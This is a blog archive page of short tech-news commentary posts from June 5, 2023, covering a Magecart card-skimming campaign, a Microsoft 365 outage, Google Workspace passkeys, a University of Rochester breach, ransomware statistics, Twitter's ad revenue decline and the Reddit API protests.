Archive for June 5, 2023

A New Magecart Credit Card Stealing Campaign Is Making The Rounds

Posted in Commentary with tags on June 5, 2023 by itnerd

A new Magecart credit card stealing campaign has been highlighted by Akamai. This new campaign hijacks retail sites to act as temporary C2 servers to inject and hide the skimmers on targeted eCommerce sites in the US, the UK, Australia, Brazil, Peru, and Estonia. Many of the victims did not realize they were breached for over a month as the threat actors had obfuscated the skimmer with Base64 encoding, hiding the host’s URL so it resembles that of Google Tag Manager or Facebook Pixel. 

David Ratner, CEO at HYAS, shares these insights:

“Protective DNS solutions are known for observing and stopping anomalous communications or connections coming out of an organization to known nefarious infrastructure; however, consumers accessing websites behave in much the same way, as the traversal of the website generates a series of connections to other domains and, in the case of Magecart infections, some being to nefarious locations. Protective DNS solutions can also be utilized by organizations to periodically scan their consumer-facing websites to identify these anomalous communications and address Magecart and other vulnerabilities, before significant numbers of consumers are taken advantage of.”

This is one of these areas where both consumers and organizations need to take steps to protect each other. By doing so, it makes these sorts of campaigns less effective.

Leave a comment »

Microsoft 365 Is Down For Thousands Of Users

Posted in Commentary with tags on June 5, 2023 by itnerd

DownDetector.com is reporting that Microsoft 365 Is down for thousands of users. It appears that users are complaining that the productivity suite is having slow performance to not being able to send emails or, or they can’t log in all together. I got a few calls on this starting about an hour ago from clients, thus I know that this is a somewhat widespread problem. I should note that Microsoft has admitted to this:

So until Microsoft figures this it, it might be a snow day for many Microsoft 365 users.

Leave a comment »

Google Cloud Introduces Passkey Support In Google Workspace

Posted in Commentary with tags on June 5, 2023 by itnerd

Today, Google Cloud announced the availability of passkey technology in Google Workspace and Google Cloud in an open beta, making it the first major cloud provider to bring passkeys to enterprise and public sector organizations. This will enable more than 9 million organizations to use passkeys instead of passwords.

Google has a blog post on this that you can find here

In early May, Google announced passkey availability for consumers. Beyond dramatically boosting security, passkeys might finally replace the password for good, making life easier for employees everywhere and their IT teams.

Additional announcement highlights include: 

  • Google data (March – April 2023) shows that passkeys are 2x faster and 4x less error prone than passwords, and are also more secure than SMS, app-based one-time passwords, and other forms of traditional two-factor authentication (2FA).
  • Passkeys can dramatically reduce the impact of phishing attacks, password fatigue, and other social engineering cyber attacks.  
  • Snap Inc. has already leveraged passkeys to help reduce the burden of password management and strengthen security for their employees. 

Leave a comment »

University Of Rochester Suffers A Data Breach

Posted in Commentary with tags on June 5, 2023 by itnerd

Today’s winner of “Who Is The Victim Of A Data Breach” is the University Of Rochester who posted this to their website:

The University of Rochester is investigating a cybersecurity attack. This data breach, which resulted from a software vulnerability in a product provided by a third-party file transfer company, has affected the University and approximately 2,500 organizations worldwide.

I’m going to go out on a limb and suggest that this “third-party file transfer company” is likely the Fortra GoAnywhere vulnerability which has lead to the pwnage of companies and organizations left and right. I have questions about that if my theory is accurate. But first I will let Ani Chaudhuri, CEO, Dasera comment on this:

The recent data breach at the University of Rochester underscores the complexity and challenge of cybersecurity in today’s digital age. Our reliance on third-party software providers means we are only as strong as our weakest link, with the entire community affected when even one vulnerability is exploited.

This incident offers a stark reminder that data security is an ongoing commitment and a continuous journey.  It’s not a checklist task to be completed and then left unattended. The software vulnerability that led to this breach was likely unknown at the time of its introduction but has had a profound impact nonetheless.

We need to empathize with the University of Rochester, the staff, and students affected by this breach. The cyber landscape is incredibly complex, and as we digitize more aspects of our lives, the risks increase. We should be reassured by the university’s swift actions, urging users to add extra layers of protection and working closely with the FBI and an external data forensics firm to investigate the breach.

However, it’s important to recognize that the sophistication of today’s cyber threats calls for more than just strong passwords and multi-factor authentication. We need to adopt a proactive and continuous approach to data security, embedding it into our operational DNA. This includes conducting regular audits, risk assessments, and implementing robust cybersecurity measures that can adapt to the ever-evolving threat landscape.

We should remember that while the internet has brought immense benefits, it has also made us vulnerable to an array of threats. Our collective security is a shared responsibility, requiring the participation of every stakeholder in the cyber ecosystem.

Lastly, this breach should prompt us to pause and re-evaluate our security measures and protocols, not as a reaction to an unfortunate incident, but as a conscious, forward-thinking strategy to protect the data that is becoming increasingly integral to our lives. This is not a trivial task but it’s a challenge we must embrace head-on in our interconnected world.

Back to my theory about the Fortra GoAnywhere vulnerability being the source of this breach. Assuming my theory is correct, this vulnerability is not new. So did the threat actors get in and set up shop before the University patched this? Or did the University not patch this and got burned because of that. I’d love to know the answers to that and I am hoping that the University puts out a full report that details what happened, and what they are going to do to make sure it never happens again.

Leave a comment »

BlackFog Releases The State Of Ransomware Report For May

Posted in Commentary with tags on June 5, 2023 by itnerd

BlackFog today released the State of Ransomware Report for May. And the news isn’t good. The top item from this report is that there has been a 154% Global Increase Over May 2022. If that doesn’t send chills down your spine. Nothing will.

Dr. Darren Williams, CEO and Founder, BlackFog, comments on the findings:

     “May represents a watershed moment for Ransomware across the globe with a significant increase in the attack success rate, with a 154% increase over 2022. Notably, we saw a concerted effort to attack law firms as attackers placed increasing emphasis on data exfiltration. The value of the data continues to climb as cyber criminals look for new ways to extort organizations and their clients. This explains the 233% increase in the services industry this month.

We continue to see specific targeting of healthcare, technology, education and government with increases of 81%, 57%, 42% and 33% respectively during May. Unreported attacks are now 5 times (489%) more than reported attacks. While down from a high of 10 last month, this is a factor of the large volume of reported attacks rather than any material change in unreported attacks, which remained relatively constant at 323.

In terms of variants, this month we saw LockBit and BlackCat continue to dominate with 18.4″ and 17.6% respectively, very similar to last month. This is consistent with unreported attacks, also dominated by LockBit and BlackCat, with 39.7% and 13.8% respectively.

Finally, illegal networks now dominate exfiltration techniques with 97% of all attacks, with a large majority originating and exfiltrating data to China 42% of the time, with Russia at 10%. We attribute the lower exfiltration to Russia due to the effect of sanctions, making it difficult to procure, launch and exfiltrate data to this nation.”

This report makes it clear that ransomware is not just a growing threat, but a clear and present danger. Thus organizations of all sizes should take this threat seriously and adjust their defences accordingly.

Leave a comment »

Twitter Advertising Is Down 59% Year Over Year

Posted in Commentary with tags on June 5, 2023 by itnerd

Linda Yaccarino hasn’t taken over as Twitter CEO yet. Though that might happen sooner than expected. Regardless, she will have to clean up one major mess that Elon Musk has created for her. Which is advertising on Twitter is down:

Elon Musk recently said Twitter’s advertising business was on the upswing. “Almost all advertisers have come back,” he asserted, adding that the social media company could soon become profitable.

But Twitter’s U.S. advertising revenue for the five weeks from April 1 to the first week of May was $88 million, down 59 percent from a year earlier, according to an internal presentation obtained by The New York Times. The company has regularly fallen short of its U.S. weekly sales projections, sometimes by as much as 30 percent, the document said.

That performance is unlikely to improve anytime soon, according to the documents and seven current and former Twitter employees.

For a business that largely relies on advertising, and with the fact that Twitter Blue which was supposed to replace advertising revenue is a failure of epic proportions, that’s not good news. Neither is this:

Some of Twitter’s biggest advertisers — including Apple, Amazon and Disney — have been spending less on the platform than last year, three former and current Twitter employees said. Large specialized “banner” ads on Twitter’s trends page, which can cost $500,000 for 24 hours and are almost always bought by large brands to promote events, shows or movies, are often going unfilled, they said.

And this:

Six ad agency executives who have worked with Twitter said their clients continued to limit spending on the platform. They cited confusion over Mr. Musk’s changes to the service, inconsistent support from Twitter and concerns about the persistent presence of misleading and toxic content on the platform.

I honestly have no idea how Yaccarino fixes this. She can make all the promises that she wants to big advertisers and ad agencies that Twitter is going to be a better place to advertise with her running the show. But Elon’s behaviour and the fact that Twitter is a toxic swamp of hate and bigotry is going send those promises to the bin. Yaccarino may want to keep her CV updated because I suspect that she might be heading to the exits once she figures out that this is a Kobayashi Maru scenario.

1 Comment »

Parts Of Reddit Will Go Dark In Protest Over Reddit Killing Access To Third Party Apps

Posted in Commentary with tags on June 5, 2023 by itnerd

In an Elon Musk like move, Reddit announced that is going to raise the price of API access, which by extension will likely kill Reddit access by third party apps like BaconReader and Apollo. For example, the developer of Apollo said that these changes would cost them $20 million a year. Which from my perspective is something that third party developers can’t sustain. The cynic in me says that this is a move by Reddit to kill third party apps and force people to use their app or the Reddit website instead. Which if that sound familiar, is what Twitter did when they pulled a similar stunt.

The difference is that unlike Twitter, Reddit users are rising up against this move:

On June 12th, many subreddits will be going dark to protest this policy. Some will return after 48 hours: others will go away permanently unless the issue is adequately addressed, since many moderators aren’t able to put in the work they do with the poor tools available through the official app. This isn’t something any of us do lightly: we do what we do because we love Reddit, and we truly believe this change will make it impossible to keep doing what we love.

The two-day blackout isn’t the goal, and it isn’t the end. Should things reach the 14th with no sign of Reddit choosing to fix what they’ve broken, we’ll use the community and buzz we’ve built between then and now as a tool for further action.

This isn’t a trivial move as Reddit like Twitter relies on user interaction to make money. But unlike Twitter who has seen a large amount of users abandon the platform, Reddit users are a much more militant bunch who will stand and fight this move and escalate if they don’t get what they want. This is going to be a problem for Reddit as I am sure that the company thought that they could push this through with little or no pushback. But clearly that is turning out not to be the case. And it will be interesting to see how Reddit deals with this. And how quickly this escalates.

2 Comments »